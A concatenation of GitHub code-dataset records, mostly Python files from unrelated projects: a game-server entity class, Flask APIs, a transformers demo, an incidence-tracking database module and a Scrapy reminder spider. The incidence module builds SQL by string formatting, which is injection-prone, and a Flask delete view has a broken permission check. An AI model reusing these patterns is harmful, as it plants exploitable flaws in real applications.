e:\n print('lolz', method, args)\n raise\n\n if not isinstance(ret_data, tuple):\n ret_data = ret_data,\n\n if len(returns) > 0:\n assert len(ret_data) == len(returns) or error(f\"Actual return values for method {method.__name__} count must be equals with formal return values count! {len(ret_data)}/{len(returns)}\", do_break=True)\n\n serialized_returns = BinarySerialization()\n for ret_index, ret_type in enumerate(returns):\n if issubclass(ret_type, MailboxProxyDatatype):\n if not ret_data[ret_index].is_exposed_mailbox and Exposed in method.rmi_specifiers['specifiers']:\n ret = ret_type.instantiate(ret_data[ret_index]).as_exposed()\n else:\n ret = ret_type.instantiate(ret_data[ret_index])\n else:\n ret = ret_type.instantiate(ret_data[ret_index])\n serialized_returns << ret.serialize()\n\n\n serialized_yield = BinarySerialization()\n serialized_yield << self.internal_id\n serialized_yield << method_index\n serialized_yield << future_id\n serialized_yield << serialized_returns\n\n message = BinarySerialization()\n message << ConnectionMessageTypes.rmi_future\n message << serialized_yield.get_archive()\n\n\n CALL_INFO_MSG(f\"Send response for method {method} {message.get_archive()}\")\n executor_connection.send(message.get_archive())\n\n\n def send_error(self, executor_connection, err, future_id):\n msg_data = BinarySerialization()\n msg_data << \"%s[%i]:%s:%s\" % (Globals.this_service.__class__.__name__,\n self.internal_id,\n Globals.this_service.endpoint[0],\n Globals.this_service.endpoint[1])\n msg_data << err\n msg_data << future_id\n\n message = BinarySerialization()\n message << ConnectionMessageTypes.rmi_error\n message << msg_data\n\n executor_connection.send(message.get_archive())\n\n def send_exception(self, executor_connection, exc, future_id):\n assert isinstance(exc, Exception)\n\n msg_data = BinarySerialization()\n msg_data << \"%s[%i]:%s:%s\" % (Globals.this_service.__class__.__name__,\n self.internal_id,\n Globals.this_service.endpoint[0],\n Globals.this_service.endpoint[1])\n msg_data << exc.__class__.__name__\n msg_data << ', '.join(exc.args)\n msg_data << future_id\n\n message = BinarySerialization()\n message << ConnectionMessageTypes.rmi_exception\n message << msg_data\n\n executor_connection.send(message.get_archive())\n\n\n def get_id(self):\n return self.internal_id\n\n def get_class_name(self):\n return self.__class__.__name__\n\n def get_endpoint(self):\n return self.service.endpoint\n\n def get_context(self):\n return Globals.context_name\n\n async def client_connected(self, client):\n client_mailbox = client if not self.is_multicast else self.all_clients_apps\n\n for name, prop_info in self.properties.items():\n var = getattr(self, name)\n if Replicated in prop_info.specifiers:\n var.initialize_property(self, name)\n var.set_client_interface(ClientVariableProxy(client_mailbox, self.internal_id, name, PartialRep_EXPERIMENTAL in prop_info.specifiers))\n\n var.replicate()\n\n if not self.is_multicast:\n self.client = await self.make_mailbox(\"ue4\", self.__class__.__name__, client.client_connection, remote_id=self.internal_id )\n\n await self.on_client_connected()\n\n\n async def on_client_connected(self):\n pass\n\n def get_subscriber(self, access_token):\n for subscribed_entity in self.subscribed_entities:\n if getattr(subscribed_entity, \"access_token\", None) == access_token:\n return subscribed_entity\n\n def on_lost_subscriber(self, subscriber):\n subscriber_client = subscriber\n if isinstance(subscriber, Entity):\n subscriber_client = subscriber.ue4client\n if subscriber in self.subscribed_entities:\n self.subscribed_entities.remove(subscriber)\n if subscriber_client in self.subscribed_clients:\n self.subscribed_clients.remove(subscriber_client)\n\n async def subscribe(self, entity_or_client):\n client: Mailbox = entity_or_client\n if isinstance(entity_or_client, Entity):\n client = entity_or_client.ue4client # todo: review it\n self.subscribed_entities.add(entity_or_client)\n\n client << partial(self.on_lost_subscriber, entity_or_client)\n\n if client in self.subscribed_clients and self.is_multicast:\n return WARN_MSG(f\"{client} already subscribed to {self}\")\n\n if len(self.subscribed_clients) > 1 and not self.is_multicast:\n self.subscribed_clients.clear()\n # return WARN_MSG(f\"Cannot subscribe {client} to {self}. Already has connection\")\n\n self.subscribed_clients.append(client)\n if self.is_multicast:\n await self.all_clients.subscribe_connection(client)\n await self.all_clients_apps.subscribe_connection(client)\n await client.CreateClientEntity(self.__class__.__name__, self.internal_id)\n await self.client_connected(client)\n INFO_MSG(f\"Client {client} subscribed to {self}\")\n\n def unsubscribe(self, entity_or_client):\n client: Mailbox = entity_or_client\n if isinstance(entity_or_client, Entity):\n client = entity_or_client.ue4client # todo: review it\n if entity_or_client in self.subscribed_entities:\n self.subscribed_entities.remove(entity_or_client)\n\n if client in self.subscribed_clients:\n self.subscribed_clients.remove(client)\n if self.is_multicast:\n self.all_clients.unsubscribe_connection(client)\n self.all_clients_apps.unsubscribe_connection(client)\n\n client.DestroyClientEntity(self.internal_id)\n\n\n def rep_all_from(self, other_entity: 'Entity'):\n for prop_name, prop_meta in other_entity.properties.items():\n if Replicated in prop_meta:\n var = getattr(other_entity, prop_name)\n var.rep_to(self)\n\n def get_properties(self, *specifiers):\n out_properties = dict()\n for prop_name, prop_info in self.properties.items():\n if set(specifiers) <= set(prop_info.specifiers):\n out_properties[prop_name] = prop_info\n return out_properties\n\n def set_lifespan(self, time_to_destroy):\n self.reanimate()\n self.timer_to_destroy = call_later(self.destroy, time_to_destroy)\n\n def reanimate(self):\n if self.timer_to_destroy:\n self.timer_to_destroy.cancel()\n\nEntity.register_all_methods()\n\n","repo_name":"broly/HaloNet","sub_path":"HaloNet/System/Core/Entity.py","file_name":"Entity.py","file_ext":"py","file_size_in_byte":19903,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1628589194","text":"base = 1.0\r\nfactor = 0.01\r\na = pow(base+factor,365)\r\nb = 1.0\r\nwhile b < a:\r\n b=1.0\r\n for i in range(365):\r\n if i % 7 in [6,0]:\r\n b=b*(base-0.01)\r\n else:\r\n b=b*(base+factor)\r\n factor = factor + 0.001\r\nprint(\"工作日的努力参数是: {:.3f}\".format(factor-0.001))\r\n","repo_name":"xianfanwindy/python123","sub_path":"w3e3.py","file_name":"w3e3.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17564515029","text":"from transformers import Trainer, TrainingArguments\n\nfrom transformers import pipeline\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification\nfrom getsampletxt import get_sample_txt\nimport torch\nimport torch.nn.functional as F\n\n\ntxt = get_sample_txt(True)\n\n# print(txt)\n# classifier = pipeline(\"sentiment-analysis\")\n\nmodel_name = \"distilbert-base-uncased-finetuned-sst-2-english\"\nmodel = AutoModelForSequenceClassification.from_pretrained(model_name)\ntokenizer = AutoTokenizer.from_pretrained(model_name)\n\ndemo_num = 5\nif demo_num == 1:\n classifier = pipeline(\"sentiment-analysis\", model = model, tokenizer = tokenizer)\n res = classifier(txt)\n print(res)\nif demo_num == 2:\n txt = \"hi. How are you. I like machine learning\"\n res = tokenizer(txt)\n print(\"tokenizer output\", res)\n tokens = tokenizer.tokenize(txt)\n print(\"tokens\", tokens)\n ids = tokenizer.convert_tokens_to_ids(tokens)\n print(\"ids\", ids)\n decoded_string = tokenizer.decode(ids)\n print(\"decode string:\", decoded_string)\nif demo_num==3:\n print(\" Using Pytorch \")\n X_train = txt\n batch = tokenizer(X_train, padding = True, truncation = True, max_length = 512, return_tensors = \"pt\")\n print('batch', batch)\n with torch.no_grad():\n outputs = model(**batch)\n print('outputs', outputs)\n predictions = F.softmax(outputs.logits, dim = 1)\n print('predictions', predictions)\n labels = torch.argmax(predictions, dim = 1)\n print(labels)\nif demo_num == 4:\n # saving and loading a model\n save_dir = \"save\"\n tokenizer.save_pretrained(save_dir)\n model.save_pretrained(save_dir)\n\n # then load\n tok = AutoTokenizer.from_pretrained(save_dir)\n mod = AutoModelForSequenceClassification.from_pretrained(save_dir)\n\nif demo_num ==5:\n # 1. prep dataset\n # 2. load pretrained Tokenizer, call it with dataset -> encoding\n # 3. build PyTorch DAtaset with encodings\n # 4. Load pretrained MOdel\n # 5. a) Load Traind and train int\n # OR\n # 5 b) native PyTorch training loop\n training_args = TrainingArguments(\"test-trainer\")\n # trainer = Trainer(\n # model,\n # training_args, \n # train_dataset= ..., \n # eval_dataset=,\n # data_collator=,\n # tokenizer = tokenizer\n # )\n\n # trainer.train()\n","repo_name":"garland3/hf_tests","sub_path":"classifier_with_tokens.py","file_name":"classifier_with_tokens.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22095502678","text":"from flask.ext.restful import Resource, fields, marshal, reqparse\nfrom server import db\nfrom server.models.job import Job\n\ncompany_fields = {\n 'id': fields.Integer,\n 'name': fields.String,\n}\n\njob_fields = {\n 'id': fields.Integer,\n 'title': fields.String,\n 'company': fields.Nested(company_fields),\n 'salary': fields.Integer,\n 'location': fields.String,\n 'summary': fields.String,\n 'perks': fields.String\n\n}\n\n\nclass JobsResource(Resource):\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('title', location='json')\n self.reqparse.add_argument('salary', location='json')\n self.reqparse.add_argument('location', location='json')\n self.reqparse.add_argument('summary', location='json')\n self.reqparse.add_argument('perks', location='json')\n super().__init__()\n\n\nclass JobsAPI(JobsResource):\n def post(self, company_id):\n args = self.reqparse.parse_args()\n args['company_id'] = company_id\n job = Job(args)\n db.session.add(job)\n db.session.commit()\n return 'Job Created!', 201\n\n\nclass JobAPI(JobsResource):\n def get(self, company_id, id):\n job = Job.query.get(id)\n return marshal(job, job_fields)\n\n def put(self, company_id, id):\n args = self.reqparse.parse_args()\n args['company_id'] = company_id\n job = Job.query.filter_by(id=id)\n job.update(args)\n db.session.commit()\n return marshal(job[0], job_fields)\n\n def delete(self, company_id, id):\n job = Job.query.get(id)\n db.session.delete(job)\n db.session.commit()\n return '', 204\n","repo_name":"michaellennox/jobber","sub_path":"server/controllers/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"11984664167","text":"from flask import Blueprint, render_template, request, flash, redirect, url_for, current_app\nfrom flask_login import login_required, current_user\nfrom werkzeug.utils import secure_filename\nfrom .models import Post, User\nfrom . import db\nimport os\n\nviews = Blueprint(\"views\", __name__)\n\n@views.route(\"/\")\ndef base():\n return render_template(\"base.html\", name=\"guest\")\n\n@views.route(\"/home\")\ndef home():\n posts = Post.query.all()\n return render_template(\"home.html\", user=current_user, posts=posts)\n\n@views.route(\"/create-post\", methods=['GET', 'POST'])\n@login_required\ndef create_post():\n if request.method == \"POST\":\n text = request.form.get('text')\n image = request.files.get('image')\n image_filename = None \n\n if not text and not image:\n flash('Post cannot be empty', category='error')\n else:\n if image:\n image_filename = secure_filename(image.filename)\n image.save(os.path.join(current_app.config['UPLOAD_FOLDER'], image_filename))\n flash('Image uploaded!', category='success')\n\n if text or image_filename: # Only create a post if there's text or an image\n post = Post(text=text, image_filename=image_filename, author=current_user.id)\n db.session.add(post)\n db.session.commit()\n flash('Post created!', category='success')\n return redirect(url_for('views.home'))\n\n return redirect(url_for('views.create_post'))\n\n return render_template('create_post.html', user=current_user)\n\n@views.route(\"/delete-post/\")\n@login_required\ndef delete_post(id):\n post = Post.query/filter_by(id=id).first()\n\n if not post:\n flash(\"Post does not exist.\", category=\"error\")\n elif current_user.id != post.id:\n flash(\"You do not have permission to delete this post.\", category=\"error\")\n else:\n db.session.delete(post)\n db.session.commit()\n flash('Post deleted', category='success')\n \n return redirect(url_for('views.home'))\n\n@views.route(\"/posts/\") # dynamic variables in routes are in <> \n@login_required\ndef posts(username):\n user = User.query.filter_by(username=username).first()\n\n if not user:\n flash(\"No user with that username exists.\", category='error')\n return redirect(url_for('views.home'))\n\n posts = user.posts\n return render_template(\"posts.html\", user=current_user, posts=posts, username=user)","repo_name":"Simran2404/blog-app-with-flask","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10974154910","text":"from typing import Union\n\n\nclass Endereco:\n def __init__(self,\n logradouro: str,\n cep: str,\n numero: Union[int, None]) -> None:\n\n self.logradouro = logradouro\n self.cep = cep\n self.numero = numero\n\n\nclass Escola:\n def __init__(self,\n nome: str,\n capacidade_para_alunos: int,\n endereco: Endereco):\n\n self.nome = nome\n self.capacidade = capacidade_para_alunos\n self.endereco = endereco\n","repo_name":"vmvuno/poo-2023-01","sub_path":"t08/escola_endereco.py","file_name":"escola_endereco.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2404753785","text":"from datetime import date, time, datetime\r\n\r\nfrom app.model.logger import create_log\r\nfrom app.model.database import connect_db, execute_query, insert_query\r\n\r\n# logger = create_log('controller.log')\r\n\r\nlogger = create_log('gestor.log')\r\n\r\n\r\nclass Incidence:\r\n def __init__(self, incidence_id, title, description, username,\r\n incidence_date, category_id):\r\n self.incidence_id = incidence_id\r\n self.title = title\r\n self.description = description\r\n self.username = username\r\n self.incidence_date = incidence_date\r\n # self.fecha_alta = datetime.today()\r\n # self.fecha_alta = datetime.now()\r\n # .strftime('%Y-%m-%d %H:%M:%S')\r\n # logger.info(self.fecha_alta)\r\n self.category_id = category_id\r\n self.priority_id = 1\r\n self.technician_hours = 0\r\n self.resolve = 0\r\n # resolve a 0 en vez de False\r\n\r\n\r\ndef insert_incidence(incidencia):\r\n incidence_id = incidencia.incidence_id\r\n title = incidencia.title\r\n description = incidencia.description\r\n username = incidencia.username\r\n incidence_date = incidencia.incidence_date\r\n category_id = incidencia.category_id\r\n priority_id = incidencia.priority_id\r\n technician_hours = incidencia.technician_hours\r\n resolve = incidencia.resolve\r\n query = \"INSERT INTO incidences \" \\\r\n \"VALUES ('{}','{}','{}',\" \\\r\n \" '{}','{}','{}','{}','{}',\" \\\r\n \"'{}' )\".format(incidence_id, title, description,\r\n username, incidence_date, category_id,\r\n priority_id, technician_hours, resolve)\r\n\r\n logger.info(query)\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n cnx.commit()\r\n cursor.close()\r\n except Exception as err:\r\n logger.error(err)\r\n\r\n\r\ndef select_incidences_user(usuario) -> tuple:\r\n result_set = []\r\n\r\n query = \"SELECT t1.incidence_id, t1.title, t1.description, t1.username,\" \\\r\n \" t1.incidence_date, t5.status_name, t3.priority_name,\" \\\r\n \"t1.technician_hours, t1.resolve,t2.category_name \" \\\r\n \"FROM incidences AS t1 \" \\\r\n \"JOIN (categories AS t2, priorities AS t3, status AS t4, type_of_status AS t5)\" \\\r\n \"ON (t1.category=t2.category_id AND t1.priority=t3.priority_id \" \\\r\n \"AND t1.incidence_id=t4.incidence_id AND t4.status_id=t5.status_id) \" \\\r\n \"WHERE t1.username='{}' AND \" \\\r\n \"(t4.end_date='00/00/00 00:00:00' OR t4.status_id=6)\".format(usuario)\r\n\r\n # logger.info(query)\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n cursor.close()\r\n\r\n for value in cursor:\r\n result_set.append(value)\r\n\r\n cursor.close()\r\n except Exception as err:\r\n logger.error(err)\r\n return result_set\r\n\r\n\r\ndef select_open_incidences(usuario) -> tuple:\r\n result_set = []\r\n query = \"SELECT t1.incidence_id, t1.title, t1.description, t1.username,\" \\\r\n \" t1.incidence_date, t5.status_name, t3.priority_name,\" \\\r\n \"t1.technician_hours, t1.resolve,t2.category_name,t1.priority \" \\\r\n \"FROM incidences AS t1 \" \\\r\n \"JOIN (categories AS t2, priorities AS t3, status AS t4, type_of_status AS t5)\" \\\r\n \"ON (t1.category=t2.category_id AND t1.priority=t3.priority_id \" \\\r\n \"AND t1.incidence_id=t4.incidence_id AND t4.status_id=t5.status_id) \" \\\r\n \"WHERE t1.username='{}' AND \" \\\r\n \"t4.end_date='00-00-00 00:00:00' AND t4.status_id \" \\\r\n \"IN(1,2,4,5) \" \\\r\n \"order by t1.priority desc\".format(usuario, usuario)\r\n\r\n logger.info(query)\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n cursor.close()\r\n\r\n for value in cursor:\r\n result_set.append(value)\r\n\r\n cursor.close()\r\n except Exception as err:\r\n logger.error(err)\r\n logger.info(result_set)\r\n return result_set\r\n\r\n\r\ndef get_next_id():\r\n\r\n query = \"Select count(*) from incidences \"\r\n\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n result_set = cursor.fetchmany(1)\r\n cursor.close()\r\n last_row = result_set[0][0] + 1\r\n logger.info('las_row: {}'.format(last_row))\r\n\r\n incidence_id = ''\r\n incidence_id += 'INC_'\r\n incidence_id += str(date.today().year) + \"_\"\r\n logger.info(type(incidence_id))\r\n logger.info(incidence_id)\r\n\r\n if last_row < 10:\r\n incidence_id = incidence_id + \"000\" + str(last_row)\r\n elif last_row < 100:\r\n incidence_id = incidence_id + \"00\" + str(last_row)\r\n elif last_row < 1000:\r\n incidence_id = incidence_id + \"0\" + str(last_row)\r\n else:\r\n incidence_id = incidence_id + last_row\r\n except Exception as err:\r\n logger.error(err)\r\n\r\n logger.info(incidence_id)\r\n\r\n return incidence_id\r\n\r\n\r\ndef select_closed_incidences() -> tuple:\r\n result_set = []\r\n query = \"SELECT t1.incidence_id, t1.title, t1.description, t1.username,\" \\\r\n \" t1.incidence_date, t5.status_name, t3.priority_name,\" \\\r\n \"t1.technician_hours, t1.resolve,t2.category_name \" \\\r\n \"FROM incidences AS t1 \" \\\r\n \"JOIN (categories AS t2, priorities AS t3, status AS t4, type_of_status AS t5)\" \\\r\n \"ON (t1.category=t2.category_id AND t1.priority=t3.priority_id \" \\\r\n \"AND t1.incidence_id=t4.incidence_id AND t4.status_id=t5.status_id) \" \\\r\n \"WHERE \" \\\r\n \" t1.incidence_id IN( \" \\\r\n \"SELECT incidence_id FROM status \" \\\r\n \"WHERE status_id=6) AND t4.status_id=6\"\r\n\r\n logger.info(query)\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n\r\n for value in cursor:\r\n result_set.append(value)\r\n\r\n cursor.close()\r\n except Exception as err:\r\n logger.error(err)\r\n\r\n\r\n return result_set\r\n\r\n\r\ndef select_all_incidences() -> tuple:\r\n result_set = []\r\n query = \"SELECT t1.incidence_id, t1.title, t1.description, t1.username,\" \\\r\n \" t1.incidence_date, t5.status_name, t3.priority_name,\" \\\r\n \"t1.technician_hours, t1.resolve,t2.category_name,t4.status_id \" \\\r\n \"FROM incidences AS t1 \" \\\r\n \"JOIN (categories AS t2, priorities AS t3, status AS t4, type_of_status AS t5)\" \\\r\n \"ON (t1.category=t2.category_id AND t1.priority=t3.priority_id \" \\\r\n \"AND t1.incidence_id=t4.incidence_id AND t4.status_id=t5.status_id) \" \\\r\n \"WHERE t4.end_date ='00-00-00 00:00:00' OR t4.status_id=6 \" \\\r\n \"order by t4.status_id\"\r\n\r\n logger.info(query)\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n cursor.close()\r\n\r\n for value in cursor:\r\n result_set.append(value)\r\n\r\n cursor.close()\r\n except Exception as err:\r\n logger.error(err)\r\n\r\n return result_set\r\n\r\n\r\ndef update_technician_hours(incidence_id, hours):\r\n query = \"UPDATE incidences SET \" \\\r\n \"technician_hours=technician_hours+{} \" \\\r\n \"WHERE incidence_id='{}'\".format(hours, incidence_id)\r\n\r\n logger.info(query)\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n cnx.commit()\r\n cursor.close()\r\n except Exception as err:\r\n logger.error(err)\r\n\r\n\r\ndef update_priority(incidence_id, priority):\r\n\r\n query = \"UPDATE incidences SET \" \\\r\n \"priority={} \" \\\r\n \"WHERE incidence_id='{}'\".format(priority, incidence_id)\r\n\r\n logger.info(query)\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n cnx.commit()\r\n cursor.close()\r\n except Exception as err:\r\n logger.error(err)\r\n\r\n\r\ndef update_resolve(incidence_id, resolve):\r\n query = \"UPDATE incidences SET \" \\\r\n \"resolve={} \" \\\r\n \"WHERE incidence_id='{}'\".format(resolve, incidence_id)\r\n\r\n logger.info(query)\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n cnx.commit()\r\n cursor.close()\r\n except Exception as err:\r\n logger.error(err)\r\n","repo_name":"kave06/Gestor-de-Incidencias","sub_path":"app/model/incidence.py","file_name":"incidence.py","file_ext":"py","file_size_in_byte":8448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36846125684","text":"# -*- coding: utf-8 -*-\n\nfrom Acquisition import aq_chain\nfrom Products.CMFPlone.interfaces.constrains import ISelectableConstrainTypes\n\nfrom plone import api\nfrom plone.app.contenttypes.behaviors.richtext import IRichTextBehavior\nfrom plone.dexterity.utils import createContentInContainer\nfrom plone.i18n.normalizer.interfaces import IIDNormalizer\nfrom plone.portlets.interfaces import IPortletAssignmentMapping\nfrom plone.portlets.interfaces import IPortletManager\nfrom zope.component import getMultiAdapter\nfrom zope.component import getUtility\nfrom zope.component import queryUtility\nfrom zope.interface import alsoProvides\n\nfrom genweb6.core.indicators import RegistryException\nfrom genweb6.core.indicators import ReporterException\nfrom genweb6.serveistic.content.serveitic.serveitic import IInitializedServeiTIC\nfrom genweb6.serveistic.content.serveitic.serveitic import IServeiTIC\nfrom genweb6.serveistic.data.folder_structure import folder_structure\nfrom genweb6.serveistic.indicators.updating import update_indicators\nfrom genweb6.serveistic.indicators.updating import update_indicators_if_state\nfrom genweb6.serveistic.portlets.bannersportlet.bannersportlet import Assignment as BannersAssignment\nfrom genweb6.serveistic.portlets.indicadors.indicadors import Assignment as IndicadorsAssignment\nfrom genweb6.serveistic.portlets.notificacions.notificacions import Assignment as NotificacionsAssignment\nfrom genweb6.serveistic.utilities import serveistic_config\n\nimport logging\nimport unicodedata\n\nlogger = logging.getLogger(name='genweb6.serveistic.indicators')\n\n\ndef Added(content, event):\n \"\"\" MAX hooks main handler \"\"\"\n\n servei = findContainerServei(content)\n if not servei:\n # If file we are creating is not inside a servei folder\n return\n\n servei_tags = servei.subject\n addTagsToObject(servei_tags, content)\n\n\ndef initialize_servei(serveitic, event):\n # If it is a copy do not execute\n if 'copy_of_' in event.newName:\n return\n\n # Configure portlets\n assignments = get_portlet_assignments(serveitic, 'plone.leftcolumn')\n if 'banners_global' not in assignments:\n assignments['banners_global'] = BannersAssignment(banner_type=u\"Global\")\n if 'banners_local' not in assignments:\n assignments['banners_local'] = BannersAssignment(banner_type=u\"Local\")\n\n assignments = get_portlet_assignments(serveitic, 'genweb.portlets.HomePortletManager3')\n if 'notificacions' not in assignments:\n assignments['notificacions'] = NotificacionsAssignment()\n\n assignments = get_portlet_assignments(serveitic, 'genweb.portlets.HomePortletManager4')\n if 'indicadors' not in assignments:\n assignments['indicadors'] = IndicadorsAssignment()\n\n # Create folder structure\n normalizer = getUtility(IIDNormalizer)\n for folder_data in folder_structure:\n try:\n if isinstance(folder_data[0], str):\n flattened = unicodedata.normalize('NFKD', folder_data[0]).encode('ascii', errors='ignore')\n else:\n flattened = unicodedata.normalize('NFKD', folder_data[0]).encode('ascii', errors='ignore')\n\n if normalizer.normalize(flattened) not in serveitic:\n createFolderAndContents(serveitic, folder_data)\n except:\n createFolderAndContents(serveitic, folder_data)\n\n # Mark ServeiTIC as initialized to prevent previous folder creations from\n # triggering the modify event\n alsoProvides(serveitic, IInitializedServeiTIC)\n\n # Facetas\n serveitic.es_faceta_1 = serveitic.ca_faceta_1\n serveitic.en_faceta_1 = serveitic.ca_faceta_1\n\n serveitic.es_faceta_2 = serveitic.ca_faceta_2\n serveitic.en_faceta_2 = serveitic.ca_faceta_2\n\n serveitic.es_faceta_3 = serveitic.ca_faceta_3\n serveitic.en_faceta_3 = serveitic.ca_faceta_3\n\n serveitic.es_faceta_4 = serveitic.ca_faceta_4\n serveitic.en_faceta_4 = serveitic.ca_faceta_4\n\n serveitic.es_faceta_5 = serveitic.ca_faceta_5\n serveitic.en_faceta_5 = serveitic.ca_faceta_5\n\n serveitic.es_faceta_6 = serveitic.ca_faceta_6\n serveitic.en_faceta_6 = serveitic.ca_faceta_6\n\n serveitic.es_faceta_7 = serveitic.ca_faceta_7\n serveitic.en_faceta_7 = serveitic.ca_faceta_7\n\n serveitic.es_faceta_8 = serveitic.ca_faceta_8\n serveitic.en_faceta_8 = serveitic.ca_faceta_8\n\n serveitic.reindexObject()\n\n\ndef serveiModifyAddSubjects(content, event):\n \"\"\" Servei modified handler \"\"\"\n\n pc = api.portal.get_tool(\"portal_catalog\")\n servei_tags = content.subject\n path = \"/\".join(content.getPhysicalPath())\n r_results = pc.searchResults(portal_type=('Document', 'Link', 'File'),\n path=path)\n\n for brain in r_results:\n obj = brain.getObject()\n addTagsToObject(servei_tags, obj)\n\n content.es_faceta_1 = content.ca_faceta_1\n content.en_faceta_1 = content.ca_faceta_1\n\n content.es_faceta_2 = content.ca_faceta_2\n content.en_faceta_2 = content.ca_faceta_2\n\n content.es_faceta_3 = content.ca_faceta_3\n content.en_faceta_3 = content.ca_faceta_3\n\n content.es_faceta_4 = content.ca_faceta_4\n content.en_faceta_4 = content.ca_faceta_4\n\n content.es_faceta_5 = content.ca_faceta_5\n content.en_faceta_5 = content.ca_faceta_5\n\n content.es_faceta_6 = content.ca_faceta_6\n content.en_faceta_6 = content.ca_faceta_6\n\n content.es_faceta_7 = content.ca_faceta_7\n content.en_faceta_7 = content.ca_faceta_7\n\n content.es_faceta_8 = content.ca_faceta_8\n content.en_faceta_8 = content.ca_faceta_8\n\n content.reindexObject()\n\n\ndef update_indicators_on_serveitic_deletion(obj, event):\n try:\n update_indicators_if_state(\n obj, ('published',),\n service=serveistic_config().ws_indicadors_service_id,\n indicator='servei-n')\n logger.info(\"Indicators were successfully reported\")\n except RegistryException as e:\n logger.warning(\n \"Error while loading indicator registry ({0})\".format(e))\n except ReporterException as e:\n logger.warning(\"Error while reporting indicators ({0})\".format(e))\n\n\ndef update_indicators_on_serveitic_review_state_change(obj, event):\n try:\n update_indicators(\n obj,\n service=serveistic_config().ws_indicadors_service_id,\n indicator='servei-n', after_commit=True)\n logger.info(\"Indicators were successfully reported\")\n except RegistryException as e:\n logger.warning(\n \"Error while loading indicator registry ({0})\".format(e))\n except ReporterException as e:\n logger.warning(\"Error while reporting indicators ({0})\".format(e))\n\n\n# --------------- helpers ---------------\n\ndef addTagsToObject(servei_tags, obj):\n tags = []\n object_tags = list(obj.subject)\n [tags.append(tag) for tag in servei_tags if tag not in object_tags]\n obj.subject = tuple(sum([object_tags, tags], []))\n obj.reindexObject()\n\n\ndef findContainerServei(content):\n for parent in aq_chain(content):\n if IServeiTIC.providedBy(parent):\n return parent\n\n return None\n\n\ndef createFolderAndContents(folder_directori, folder_data):\n # Create folder\n folder_props = {\n 'title': folder_data[0],\n 'checkConstraints': False,\n 'exclude_from_nav': folder_data[2],\n 'allow_discussion': folder_data[3]}\n if folder_data[5] is not None:\n folder_props['layout'] = folder_data[5]\n folder = createContentInContainer(folder_directori, folder_data[1], **folder_props)\n\n behavior = ISelectableConstrainTypes(folder)\n behavior.setConstrainTypesMode(1)\n behavior.setLocallyAllowedTypes(folder_data[4])\n behavior.setImmediatelyAddableTypes(folder_data[4])\n folder.reindexObject()\n\n # Create a contents\n for folder_content in folder_data[7]:\n createContentInFolder(folder, folder_content)\n\n if folder_data[6] is not None:\n folder.setDefaultPage(folder_data[6])\n\n\ndef createContentInFolder(folder_directori, folder_content):\n # Create content\n if folder_content[1] != \"Folder\":\n content_props = {\n 'title': folder_content[0],\n 'checkConstraints': False,\n 'exclude_from_nav': folder_content[2],\n 'allow_discussion': folder_content[3]}\n\n if folder_content[6] is not None:\n content_props['description'] = folder_content[6]\n\n if folder_content[7] is not None:\n content_props['text'] = IRichTextBehavior['text'].fromUnicode(folder_content[7])\n\n if folder_content[5] is not None:\n content_props['layout'] = folder_content[5]\n\n content = createContentInContainer(folder_directori, folder_content[1], **content_props)\n if folder_content[4] is not None:\n behavior = ISelectableConstrainTypes(content)\n behavior.setConstrainTypesMode(1)\n behavior.setLocallyAllowedTypes(folder_content[4])\n behavior.setImmediatelyAddableTypes(folder_content[4])\n else:\n createFolderAndContents(folder_directori, folder_content)\n\n\ndef get_portlet_assignments(context, name):\n portlet_manager = queryUtility(IPortletManager, name=name, context=context)\n return getMultiAdapter((context, portlet_manager), IPortletAssignmentMapping)\n","repo_name":"UPCnet/genweb6.serveistic","sub_path":"src/genweb6/serveistic/subscribers.py","file_name":"subscribers.py","file_ext":"py","file_size_in_byte":9262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37841022181","text":"import scrapy, smtplib\n\n\nclass SanjeshSpider(scrapy.Spider):\n name = 'sanjesh'\n allowed_domains = ['sanjesh.org']\n counter = 0\n _from = \"reminder@mostafaghanbari.ir\"\n _to = \"godhelot1@gmail.com\"\n last_message = \"\"\n\n def start_requests(self):\n print(\"start\")\n self.send_mail(self.create_mail_message('starting crawler from host', 'Hello, this is a log email from host'))\n yield scrapy.Request(url=\"http://sanjesh.org/\", callback=self.parse, dont_filter=True, errback=self.err_back)\n\n def parse(self, response):\n self.counter = self.counter + 1\n if self.counter % 12 == 0:\n self.send_mail(self.create_mail_message(f\"Hourly reminder:{self.counter / 12}\",\n f\"Hello, checking for {self.counter / 12} 